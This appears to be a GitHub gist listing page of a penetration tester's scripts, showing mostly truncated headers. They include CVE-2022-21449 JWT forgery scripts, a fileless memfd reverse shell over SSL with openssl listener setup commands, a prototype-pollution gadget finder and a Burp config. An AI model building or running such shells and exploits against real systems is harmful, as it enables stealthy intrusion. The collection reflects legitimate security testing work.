dualfade
#!/usr/bin/env python3
# gql_mutation_payload.py
# @dualfade
# NOTE: refs --
# https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3
# https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation
# https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/
"""
#!/usr/bin/env python3
# cve-2022-21449.py
# dualfade --
# refs --
# https://bit.ly/3aVqwsC --
# https://bit.ly/3tw6z1P --
# initial jwt --
# ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \
#!/usr/bin/env ruby
# cve-2022-21449
# dualfade --
# rewrite in ruby 3 --
# imports --
require 'bundler/inline'
require 'ecdsa/signature'
require 'ecdsa/format'
#!/usr/bin/env ruby
# typed: false
# dualfade --
# memfd_create_rssl.rb --
# NOTE: from sorbet --
# https://sorbet.org/docs/adopting --
# gem 'sorbet-static-and-runtime'
# gem 'tapioca', require: false, :group => :development
#!/bin/bash
# shellcheck disable=SC2059
# simulate_typing.sh
# #dualfade --
# ref --
# tldr xdotool; https://www.mankier.com/1/xdotool --
# tldr xclip; https://linux.die.net/man/1/xclip --
function vdi_clip2win() {
gomuks v3.0.0 --
https://github.com/tulir/gomuks
how to remove "Empty Room" in gomuks --
Do the following --
Ref:
https://github.com/tulir/gomuks/issues/192#issuecomment-760003730
Log in to the Chromium Element web account
@dualfade
dualfade / fingerprint.js
Last active March 25, 2023 18:08 — forked from nikitastupin/fingerprint.js
fingerprint.js
// find javascript gadgets --
// forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec
// ref => https://github.com/BlackFan/client-side-prototype-pollution
// ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
// updated; @dualfade --
// start --
// check for known gadgets --
(() => {
// gadgets --
function interceptNetworkRequests(ee) {
const open = XMLHttpRequest.prototype.open;
const send = XMLHttpRequest.prototype.send;
const isRegularXHR = open.toString().indexOf('native code') !== -1;
// don't hijack if already hijacked - this will mess up with frameworks like Angular with zones
// we work if we load first there which we can.
if (isRegularXHR) {
@dualfade
dualfade / BurpSuiteSSLPassTrough.json
Last active December 13, 2022 04:19 — forked from vsec7/BurpSuiteSSLPassTrough.json
Filter out the noise
{
"proxy": {
"ssl_pass_through": {
"automatically_add_entries_on_client_ssl_negotiation_failure": false,
"rules": [
{
"enabled": true,
"host": ".*\\.google\\.com",
"protocol": "any"
},
#!/usr/bin/env python3
# memfd_rssl_shell.py
# dualfade
# memfd reverse shell over ssl --
# inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 --
# ex: server side --
# openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
# openssl s_server -quiet -key server.key -cert server.pem -port 8443